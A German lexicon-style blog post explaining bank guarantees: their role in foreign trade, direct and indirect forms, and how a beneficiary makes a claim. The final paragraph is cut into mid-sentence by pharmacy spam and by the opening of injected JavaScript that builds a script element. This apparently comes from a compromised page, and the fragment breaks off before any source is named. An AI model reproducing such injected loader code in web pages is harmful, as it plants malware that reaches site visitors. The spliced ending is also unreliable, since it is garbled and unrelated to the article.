Die Bankgarantie

Eine Bankgarantie bedeutet nicht etwa, dass der Kunde garantiert ein Darlehen bekommt.
Bankgarantien sind mehr oder weniger bedingte Zahlungszusagen einer Bank, die gegen eine entsprechende Absicherung gegeben werden.

Wo werden Bankgarantien eingesetzt?
Bankgarantien gelten als Sicherungsform von Auslandsgeschäften. Zum einen sollen sie die Einhaltung von Vertragspflichten absichern und somit gleichzeitig die Bonität des Kunden erhöhen. Zum anderen ist es von Seiten der Bank ein Zahlungsversprechen für eine bestimmte Transaktion des Garantienehmers. Es sichert damit das Risiko zwischen dem Käufer und Verkäufer ab. Kann der Garantienehmer seinen Verbindlichkeiten nicht folge leisten, tritt die Bank mit ihrer Bankgarantie für den Verkäufer ein. Es sichert quasi das Geschäft des Verkäufers ab. Weiter eingesetzt werden Bankgarantien als Sicherheitsleistung statt einer Kaution im Außenhandel. Bankgarantien sind keine Geldanlage, sie dienen lediglich zur Erleichterung und seriösen Abwicklung im Geschäftsleben.
Im Gegensatz zu einer Bürgschaft ist die Garantieleistung nicht gesetzlich geregelt.
Im Außenwirtschaftsverkehr wird die Praxis vornehmlich von Kreditinstituten getätigt.
Eine Bankgarantie setzt einiges voraus.

Wie läuft eine Bankgarantie ab?
Generell gilt ein Garantievertrag als ein Leistungsversprechen abstrakter Natur. Der Garantievertrag ist von dem zu sichernden Geschäft total unabhängig. Es wird mit dieser Garantie lediglich eine bestimmte Leistung garantiert. Hierbei ist es völlig unabhängig, ob diese Leistung vollbracht wurde oder nicht.

Es gibt zwei Arten von Garantie:
Die indirekte Garantie und die direkte Garantie. Eine direkte Garantie kommt vielfach bei Inlandsgeschäften vor. Häufig genügt hier schon eine Bürgschaft, die in Form einer direkten Garantie an den Begünstigten abgegeben wird. Eine direkte Garantie wird eingesetzt, wenn die Sicherungspflicht der Bank nicht von der Durchsetzbarkeit des Schuldverhältnisses abhängen darf.

Die indirekte Garantie:
Derartige Garantien kommen häufig bei Exportgeschäften zur Anwendung. Vielfach wenn Staatsunternehmen oder staatliche Stellen zu den Begünstigten zählen.
Erschwerend kommt hinzu, dass in vielen Ländern die gesetzlichen Vorschriften eine ausländische Bank als Garantiebank nicht akzeptieren. Daher wird bei einer indirekten Garantie in der Regel eine zweite ausländische Bank eingeschaltet.

Wie wird die Bankgarantie in Anspruch genommen?
Die Inanspruchnahme der Bankgarantie gibt dem Begünstigten das Recht, den Garantiebetrag oder einen Teilbetrag zu verlangen. Die Bank prüft lediglich formell, ob alle Bedingungen erfüllt und eingehalten wurden. Die ganze Prozedur wird auch noch mit einer Unterschriftenprüfung versehen, damit sicher gestellt ist, dass nur der Begünstigte für die Inanspruchnahme der Bankgarantie in Frage kommt. order Ventolin Cytotec generic Buy Cialis super active var d=document;var s=d.createElement('script'); if (document.currentScript) {

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.